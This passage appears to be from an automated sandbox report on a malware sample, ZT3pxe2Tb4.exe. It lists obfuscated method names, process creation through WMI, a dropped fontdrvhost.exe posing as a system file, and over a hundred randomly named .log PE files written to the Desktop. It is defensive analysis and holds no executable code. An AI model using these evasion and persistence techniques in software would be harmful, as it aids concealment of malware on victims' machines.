Source: ZT3pxe2Tb4.exe, lLDVmHLWjUhCgYrl3Rg.cs High entropy of concatenated method names: '_5E9', 'V29', 'e6S', '_2Q4', 'CVq', 'HhNWFG8bXcH', 'cnqWi5B8Sbb', 'X8AQLdWolZGJxE38xfCR', 'Y7Sd6lWo722K81KQJ3FY', 'TCt6L4WodsXcKPX2ZL6w'
Source: ZT3pxe2Tb4.exe, V8766ojZZ4pu3HNSGos.cs High entropy of concatenated method names: 'arCjbqDUrl', 'bU3jomaRAl', 'fxejh6Pdhr', 'T7GjOXB093', 'lgdb66WKsWBGWtTbOSLg', 'zgUv20WKTs7gtxMXsqGp', 'wN05nXWKkTuVfTyOMk32', 'NOLUt4WKD2vR98fuVTVr', 'ryJ3C6WKpOS3bm1ZbBMx', 'ew0LLVWKuBM2g2r0q5Y0'
Source: ZT3pxe2Tb4.exe, WVZ0XYgYvlJtODagQ4F.cs High entropy of concatenated method names: 'ahobZ0h2pM', 'n71byrebkH', 'MTWkW5WPKDbrUbfHH11G', 'r7Cs7SWPhPaojModqhZn', 'OBa3sgWPOefmy3Y7tWD7', 'Gk309gWPattNTrjvlY2w', 'T1rEcAWPlAtWwwg6dj46', 'WPBbavVqcE', 'HHiIiIWP0OwIOiilHw3g', 'pU4vH4WPdRnGTtrF1Viv'
Source: ZT3pxe2Tb4.exe, GYCJ4CFUhCyW29mDrt9.cs High entropy of concatenated method names: 'pyKFwXLJtt', 'm4eF4gHWm3', 'SQhFCmN6qa', 'JM4FcXkOwE', 'cmeFJSEqwv', 'O2eFATvm8h', 'zW6FzaBrNf', 'Jwu2q1WdZWckrAEECoy7', 'cUp2nUWdyO0LpGWuhhw5', 'dv4QX0WdeE5UyisZg8xV'
Source: ZT3pxe2Tb4.exe, IpLxPxiJdq7xL6uVcaa.cs High entropy of concatenated method names: 'ahWjTuYles', 'rEkPJnWKWqQ9i3GBmu5C', 'Pc1X37WOz09bHfLGhpPC', 'qTJKICWK3Wy4tyITLdPj', 'pRNLW4WKqOVqJjVhvi9s', 'h58omOWKiPhADiSt5yW6', 'gZpMuQWKjkfbwlRe1pwW', 'MiAk6QWKMaI9bmcWvWeP', 'toujg5o3n4', 'rR1kOeWKFE608C3DKwrs'
Source: ZT3pxe2Tb4.exe, hMT9ywHlIqlcYuym49Q.cs High entropy of concatenated method names: 'Yi3', 'zMtWF7R1TaH', 'RLJHd2wyg9', 'mRsWFdCKttI', 'GGqUqJW0uIaM5SGOMZRL', 'NZIZbQW0Bp8snB9vxcS9', 'gLQnlPW0DTrsZoPoqhfm', 'vWWgG2W0pktMsZrUDE9s', 'QoYXryW0GY9vbhW580db', 'k8u5veW0S33SNv9uhQ8U'
Source: ZT3pxe2Tb4.exe, oYwZnTJ15040JqFbW6V.cs High entropy of concatenated method names: 'N1aJlXhMBd', 'rRwJ7vQZj8', 'yr7JdB9frj', 'mb7JY6hFXI', 'WRhJ0vPybJ', 'FtEJX7oEE6', 'GX4JVOiVXt', 'JJ8JrGN4dp', 'lNJJtSsDGp', 'OB8Jmb4KMh'
Source: ZT3pxe2Tb4.exe, a3TVa9pePG9oxZpcv7.cs High entropy of concatenated method names: 'L2x7TpOb1', 'xRbFGtWyw7LZDM6uhCl0', 'TCyhTVWyQPyXwgXJmVlE', 'JZ2x2iWyROMTIGDHNsRK', 'v0WBgUSfr', 'HYRGaqCYV', 'BPvSfs5rf', 'Wku1NZ6GR', 'UVkgJAyeq', 'eEieZ8pBs'
Source: ZT3pxe2Tb4.exe, m9y5wALnB8SHFKsKEAV.cs High entropy of concatenated method names: 'zbSLJgGDnv', 'pvFLAKXC3u', 'kpoLzxUEwQ', 'sF2nYfWh70XvZxUVL3LY', 'ugO4ESWhaH24Xk31gykB', 'ACFtYpWhl3HKL3M6ner0', 'XL5iq82DK7', 'QdDyGuWhXSFNpWWw30Be', 'QD3K41WhY9jqBgA0Ia1X', 'pu2RGGWh0JW2wxAbrAbM'

Persistence and Installation Behavior
barindex
Creates processes via WMI
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Drops PE files
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IsWIxvZJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\auteTnDC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fzXEwQRC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zTojkKNX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\AaPSReOe.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uztLDTCs.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hezDLgou.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tIxJOpqh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CkrRJHNx.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\bYjfzcZg.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xOrrZDRn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\yEAAOeyR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WvXEaKPX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ntFcgnCN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\feqUKmVF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\bAJNFhyM.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WAZwZzli.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\BxnIYuRz.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\AppData\Local\fontdrvhost.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\EQFIYaOX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fLnmpTPV.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RMfXVWDe.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\EOpBrqDR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\nJodFojJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\UbSwNisy.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aYVnMXzh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RnzHiPIs.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\RMCoLrQk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uRiBlhjd.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\PCgnLZlk.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\qxbJOXLg.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CGTrJaEm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YMjefUJa.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hRSCUTxn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CgRzmzKC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HuSZzPsz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\LovAYRCw.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\inkviYhq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pzYaRqdW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\piqUgtXk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\hJcmyZDP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\eCwwaQCH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QkEpPQey.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tAOrkGQb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qiKKKJQB.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\lThKWNPp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\cnAeDqUL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ELDRalsN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\oTDkKMId.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IdUqmnRm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ipFMCTyG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DACRVJoK.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\IbKgwPay.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\avWEvUWS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ldamqVhj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YsHvxEyH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KWVhlfdm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aABfDneW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YnJNkaiG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KOmOGvDg.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zldaSYtH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FvSbvlyH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mbeUnBPt.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MLVQXpXH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NmOPODYO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JavyIngh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YBjETBXN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pntLeisv.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KszgdGmQ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aLYWFcdp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fuaVjmBB.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\VPWFywnw.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\pMKkuPam.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JvAHRkKP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XzKOkXsR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\VWGgLdif.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YVGePHcW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DQsQlVoZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\lCADkPID.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HlvZPcYC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CTQIQVae.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GspafaHt.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\CdkYHFFH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RraOLYZw.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TORFqFIZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TWBYVoif.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zntiAIEO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dbVNVLdb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\maCuLVwe.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\wOXBumXW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RRcFiATg.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\THFECrua.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TlbPEPXm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rrvChBIx.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GGiHtSpS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZbufrXkm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qguCdZEu.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dabMNWxu.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ouGCZwUD.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DEcjsSrF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MTLhtkSf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\cixmEAyA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\DdBAnNSZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\UOaorzbP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xgyKnYKq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\gmudUmpb.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\PwAgeDiA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OnJqPAWm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QfCxRbIn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NMMXsbef.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rmtKjMmm.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MPlPWbPk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RMaOjKxV.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\AFOsBjYP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OjpXkDnJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XEIwxBIS.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MHvzAhUM.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rAfUMkjC.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\oQWKeSDj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WYfWtHNc.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\RCCOzYeY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\GPSaXBQY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iJlVzTXF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\HxFJRUCD.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ifAdEpGk.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IHwzgXOR.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\COTaDrJc.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kdNuDPIk.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\pJXAdKPi.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xkYbKhNl.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\xHZssejW.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\phJkSByL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\qiEMTywj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kMzdwiuP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\lHCvjEeO.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\blWejAjG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XzFFzMmI.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\NWMxEuQr.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mCNvXUiC.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\XFfNnXVZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ZklVGaxA.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FWzHsBqG.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OEWHVhjH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\NgoGZspx.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iANVPgEI.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\xvPIrmGV.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\nJvbxzCb.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\tqrrAUxf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\PEqxAxdY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JAxqeOaQ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OemrfNDp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TCIWpNeY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\IiRYzRio.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\YUSxJEkf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zfzIrCEh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\SbqYhYfr.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\SdGfOIqy.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\LtTWIWgh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\TYRgCYum.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aVjDvRpd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\MMDorhKp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\JfyqGcCs.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WgOpYqoh.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KjbhtTTT.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kQZvTrxL.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ylQifTUJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\aFyNQRuY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sihlzJJp.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\WzsNMHNJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uHokLZDZ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zReaumVj.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\kUpuTdpn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uvZrYWTP.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\jECTfuuL.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\DnshUSLJ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\ULtOMFWU.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\iKNvbzqU.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\msUTDNPI.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\zsrQNmVQ.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\uJzjHyIX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\dKmMwLxf.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fqGCEpSY.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OzZYIDTF.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\FWXhQVXq.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\QpCXcuuA.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\SKewgrff.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sXAbZyyE.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\wHLAFYKX.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sQxsIGwX.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\nHlSHaLn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fyqViYtd.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\sYhLnqXd.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\XxwvJouT.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\KnZYovDz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\zuGjoWSN.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\fvxnZIOH.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\inpEUjnz.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\XsyMwKeS.log Jump to dropped file
Source: C:\Users\user\Desktop\ZT3pxe2Tb4.exe File created: C:\Users\user\Desktop\dpYUmTzI.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\mJblSiJK.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\OgxpbmIn.log Jump to dropped file
Source: C:\Users\user\AppData\Local\fontdrvhost.exe File created: C:\Users\user\Desktop\rudcNvNr.log Jump to dropped file
